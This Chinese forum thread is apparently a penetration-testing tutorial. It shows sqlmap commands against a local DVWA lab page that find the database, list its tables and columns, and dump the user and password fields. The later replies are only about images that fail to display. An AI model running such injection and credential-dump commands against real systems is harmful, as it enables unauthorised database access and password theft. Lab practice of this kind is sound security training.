请选择 进入手机版 | 继续访问电脑版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 1331|回复: 3

sqlmap 快速体验

[复制链接]

1

主题

2

回帖

9

积分

新手上路

积分
9
发表于 2024-1-9 00:03:47 | 显示全部楼层 |阅读模式


- 获取当前数据库

  ```
  sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --current-db
  ```


  得知数据库名为dvwa

  ![image-20231205181614677](image/image-20231205181614677.png)

- 获取当前数据库下的表

  ```
  sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --D dvwa --tables
  ```

  ![image-20231205181636230](image/image-20231205181636230.png)

- 获取指定表的字段信息

  ```
  python sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D "dvwa" -T "users" --columns
  ```

  ![image-20231205181720063](image/image-20231205181720063.png)

- dump表中指定字段的数据

  ```
  python sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C "user,password" --dump
  ```

  ![image-20231205181823016](image/image-20231205181823016.png)
回复

使用道具 举报

1

主题

2

回帖

9

积分

新手上路

积分
9
 楼主| 发表于 2024-1-9 00:05:04 | 显示全部楼层
F:\BaiduSyncdisk\笔记\pentest\工具使用\其他\image\image-20231205181610515.png
回复

使用道具 举报

1

主题

2

回帖

9

积分

新手上路

积分
9
 楼主| 发表于 2024-1-9 00:05:36 | 显示全部楼层
图片插入不好使
回复

使用道具 举报

0

主题

2

回帖

8

积分

管理员

积分
8
发表于 2024-1-9 00:45:43 | 显示全部楼层
这个是插入图片是无法显示吗,好的等我核实一下
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|网络安全运维技术交流论坛 ( 黔ICP备2021010738号|贵公网安备2021010738号 )

GMT+8, 2024-4-21 16:49 , Processed in 0.027503 second(s), 18 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表